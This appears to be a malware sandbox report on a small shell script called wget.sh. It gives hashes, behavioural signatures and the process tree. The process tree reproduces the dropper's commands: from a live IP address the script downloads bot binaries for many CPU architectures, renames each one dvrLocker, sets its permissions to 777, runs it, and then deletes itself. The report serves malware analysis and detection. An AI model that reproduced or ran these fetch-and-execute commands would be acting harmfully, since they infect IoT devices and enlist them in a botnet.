Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
12s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
-
submitted
18/10/2024, 09:41
General
-
Target
wget.sh
-
Size
420B
-
MD5
878878ef9a55d128c2917bfb365e4261
-
SHA1
3f95d013d7602c813cafd4be15c43c37a9c71d2e
-
SHA256
bd6ee818b79172a3d43e87463157ee94c942a321fd2ed582610962e323d0817a
-
SHA512
dfb89655ef3662bb93b765211863cdff5101a00edf9f45b741e8c401402ec429196cf97b4c4e54dfbfc7153b3c50c2ae9da5e3fab45d51a96f0f25ca6c365cf6
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 10 IoCs
-
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵
- Writes file to tmp directory
-
/bin/rmrm -rf dvrLocker2⤵
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.arm -O -2⤵
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.arm5 -O -2⤵
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.arm6 -O -2⤵
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.arm7 -O -2⤵
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.m68k -O -2⤵
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.mips -O -2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.mipsel -O -2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.sparc -O -2⤵
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.sh4 -O -2⤵
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.powerpc -O -2⤵
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf dvrLocker2⤵
-
-
/bin/rmrm -rf /tmp/wget.sh2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD5db1a114307c57d7d97acf3dbe1959bf5
SHA1a8a3d0b323ec3229ec2c06a8dfff9486cd987739
SHA256044462feecab936afe4620ee15c24854f1f48d3b18fd5b5d07f1fda274371ead
SHA5125924211f76c6d8a2f88fab8c8f14ec221efd8488de3ca493ec8fd0e5cfb287b2c2563184b406033f37dab9d4121203d22669415ecdf668c2e2e1f5a5c4eb517c
-
Filesize
79KB
MD5100bb4a2cdca8f6ca51a8ef6a48f72b7
SHA12c7f1719b4fecbc60fb0548ee4efb3bbb8b1475b
SHA25663b8f7c6450ec58f718be6465da5660a17e45b90f9a6f6e2340f15f40a3d1e58
SHA51278a32f82b42f476f40e0798e28fb89b8bfd8d95f3da87ea7e2572ef5a9019df780f8bc3322cc63a1ab023b48e25ca44c855d320a28d18d6eec0e089ce6f045d2
-
Filesize
54KB
MD5be76a190f3b90d5cb00a5cbc15b112a4
SHA1da8903c31f36952390ff4975683504b9ceff05ea
SHA2569258876ed0aaf0ff28b2b68c5e1ebac8680d7dc8b5de2f67e198035b1f1d545e
SHA5120ef32ef56b4cd888974fc1e900be3956ef23e447b4efb3c1231b11dd77596455b9a5f2927c11f2380308deeb5e97b1a8afd76c350d2d70daea9c1b862934b771
-
Filesize
54KB
MD5e416439abb52454448f56c016daa4dea
SHA1f5dc393e1f8b3859b3e38f38febe78aa5f20e733
SHA256d47579b7e218ac96d3d25c3f3ad2c6a00d2af91b07687a394adfd86cf1d972df
SHA512c92336de627399aca5e3b771b68a51e04338eb79af637776b2e5844868266dd408362c9c0aca5687b9dc6b880fe740fe3dcebcc200bff1ea7e2076ed10cf8b3d
-
Filesize
65KB
MD523c99866e6a90c1aa327cca2078bf089
SHA1a78539835a6c34b0da02c08379c220b708888017
SHA2568da57edc934cf3432607e37dfdfd7c6b461234beaf722ec0b3d49a2aea03191d
SHA5122a6401ed67c460414bcc5a2d721718f615be2e78ac882dfce57460377a19f31ce96162d9e5a40386ddbef4cb71fa9063763d921bc944fc9f756723cb689bb39c
-
Filesize
77KB
MD5d2c3556a910e0370ecd3997cfd8b8f69
SHA1b220577b9ac4ff9a662bd4a66ba3c4fff878c253
SHA25623147675e90639c0bc4d038c3c72cf9191712d730c4eec0c58a7173250fd3ea0
SHA512e6715854ef515cf1537307bc588790f75df7487fe0e28329a425bb616b409f8a0282555bc2367eed6faad074e34043ff4f95b97c441e5ecfa011c177e713cc8c